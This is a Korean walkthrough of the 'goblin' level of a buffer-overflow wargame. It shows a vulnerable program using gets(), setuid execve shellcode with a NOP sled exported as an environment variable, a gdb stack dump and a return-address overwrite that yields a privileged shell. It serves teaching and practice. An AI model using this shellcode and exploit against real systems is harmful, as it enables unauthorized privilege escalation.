BOF 원정대 – Level 3 (goblin)

문제 소스는 아래와 같다.

/*
 The Lord of the BOF : The Fellowship of the BOF
- goblin
- small buffer + stdin
*/

int main()
{
 char buffer[16];
 gets(buffer);
 printf(%s\n, buffer);
}

이전 문제와 다른 점은 인자를 argv로 받는것이 아니라 gets() 함수를 이용해 받는다는 것이다. get() 함수를 이용해 인자를 받을때는 아래와 같이 풀이를 하면 된다.

[cobolt@localhost cobolt]$ export SH=`python -c print '\x90'*100000 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'` 
[cobolt@localhost cobolt]$ gdb goblin_tmp 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB. Type show warranty for details.
This GDB was configured as i386-redhat-linux...
(gdb) b main
Breakpoint 1 at 0x80483fe
(gdb) r
Starting program: /home/cobolt/goblin_tmp 

Breakpoint 1, 0x80483fe in main ()
(gdb) x/32wx $esp
0xbffe7478: 0xbffe7488 0x080483eb 0x08049480 0x08049494
0xbffe7488: 0xbffe74a8 0x400309cb 0x00000001 0xbffe74d4
0xbffe7498: 0xbffe74dc 0x40013868 0x00000001 0x08048350
0xbffe74a8: 0x00000000 0x08048371 0x080483f8 0x00000001
0xbffe74b8: 0xbffe74d4 0x080482bc 0x0804844c 0x4000ae60
0xbffe74c8: 0xbffe74cc 0x40013e90 0x00000001 0xbffe75c3
0xbffe74d8: 0x00000000 0xbffe75db 0xbffe75fd 0xbffe7607
0xbffe74e8: 0xbffe7615 0xbffe7634 0xbffe7643 0xbffe765c
(gdb) 
0xbffe74f8: 0xbffe7678 0xbffe7683 0xbffe7691 0xbffe76d3
0xbffe7508: 0xbffe76e5 0xbffe76fa 0xbffe770a 0xbffe7716
0xbffe7518: 0xbffe7734 0xbffe773f 0xbffffe0c 0xbffffe19
0xbffe7528: 0xbffffe21 0x00000000 0x00000003 0x08048034
0xbffe7538: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffe7548: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffe7558: 0x00000008 0x00000000 0x00000009 0x08048350
0xbffe7568: 0x0000000b 0x000001f6 0x0000000c 0x000001f6
(gdb) 
0xbffe7578: 0x0000000d 0x000001f6 0x0000000e 0x000001f6
0xbffe7588: 0x00000010 0x0febfbff 0x0000000f 0xbffe75be
0xbffe7598: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffe75a8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffe75b8: 0x00000000 0x36690000 0x2f003638 0x656d6f68
0xbffe75c8: 0x626f632f 0x2f746c6f 0x6c626f67 0x745f6e69
0xbffe75d8: 0x4c00706d 0x4f535345 0x3d4e4550 0x73752f7c
0xbffe75e8: 0x69622f72 0x656c2f6e 0x69707373 0x732e6570
(gdb) 
0xbffe75f8: 0x73252068 0x45535500 0x4d414e52 0x48003d45
0xbffe7608: 0x53545349 0x3d455a49 0x30303031 0x534f4800
0xbffe7618: 0x4d414e54 0x6f6c3d45 0x686c6163 0x2e74736f
0xbffe7628: 0x61636f6c 0x6d6f646c 0x006e6961 0x4e474f4c
0xbffe7638: 0x3d454d41 0x6f626f63 0x5200746c 0x544f4d45
0xbffe7648: 0x534f4845 0x39313d54 0x36312e32 0x31322e38
0xbffe7658: 0x00312e38 0x4c49414d 0x61762f3d 0x70732f72
0xbffe7668: 0x2f6c6f6f 0x6c69616d 0x626f632f 0x00746c6f
(gdb) 
0xbffe7678: 0x4d524554 0x6e696c3d 0x48007875 0x5454534f
0xbffe7688: 0x3d455059 0x36383369 0x54415000 0x752f3d48
0xbffe7698: 0x6c2f7273 0x6c61636f 0x6e69622f 0x69622f3a
0xbffe76a8: 0x752f3a6e 0x622f7273 0x2f3a6e69 0x2f727375
0xbffe76b8: 0x52313158 0x69622f36 0x682f3a6e 0x2f656d6f
0xbffe76c8: 0x6f626f63 0x622f746c 0x48006e69 0x3d454d4f
0xbffe76d8: 0x6d6f682f 0x6f632f65 0x746c6f62 0x504e4900
0xbffe76e8: 0x43525455 0x74652f3d 0x6e692f63 0x72747570
(gdb) 
0xbffe76f8: 0x48530063 0x3d4c4c45 0x6e69622f 0x7361622f
0xbffe7708: 0x53550068 0x633d5245 0x6c6f626f 0x41420074
0xbffe7718: 0x455f4853 0x2f3d564e 0x656d6f68 0x626f632f
0xbffe7728: 0x2f746c6f 0x7361622e 0x00637268 0x474e414c
0xbffe7738: 0x5f6e653d 0x53005355 0x90903d48 0x90909090
0xbffe7748: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe7758: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe7768: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) 
0xbffe7778: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe7788: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe7798: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77a8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77b8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77c8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77d8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77e8: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) q
The program is running. Exit anyway? (y or n) y
[cobolt@localhost cobolt]$ (python -c print 'A'*20 + '\xe8\x77\xfe\xbf'; cat) | ./goblin 
AAAAAAAAAAAAAAAAAAAA

 id
uid=503(goblin) gid=502(cobolt) egid=503(goblin) groups=502(cobolt)
my-pass
euid = 503
hackers proof